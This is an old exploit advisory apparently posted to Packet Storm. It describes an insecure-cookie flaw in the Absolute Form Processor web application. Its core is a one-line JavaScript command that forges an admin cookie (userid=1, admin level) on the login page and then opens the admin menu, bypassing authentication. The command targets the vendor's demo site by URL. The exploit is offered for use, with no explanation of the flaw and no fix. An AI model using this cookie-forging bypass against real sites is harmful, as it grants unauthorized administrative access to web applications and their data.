absoluteform-cookie.txt

2008-10-31T00:00:00
ID PACKETSTORM:71402
Type packetstorm
Reporter EgY Coders Team
Modified 2008-10-31T00:00:00

Description

                                        
                                            `###############################################################################################  
_____ ____ __ ___ ______ ______ | ____ _____ _____  
| / ___| \ \ / / / ____| / | | | | _ \ |  
|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____  
| | |_ || | | | |____ | | | | | | _ | |  
|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______|  
  
[~] Author : Hakxer  
[~] Home : Www.educ-up.com  
[~] Type Gap : Insecure Cookie Handling  
[~] script : Absolute Form Processor [see script] http://www.xigla.com/absolutefpnet/demo.htm  
[~] Team : EgY Coders   
#################################################################################################  
  
Exploit : First go to http://www.xigla.com/absolutefpnet/demo/login.aspx  
Second Execute JS Code   
[~] javascript:document.cookie="xlaAFPDEMOadmin=userid=1&lvl=1&createforms=checked";  
Now Go to http://www.xigla.com/absolutefpnet/demo/menu.aspx  
  
--- Proud To Be A Muslim ---  
  
# _=END=_ #   
  
`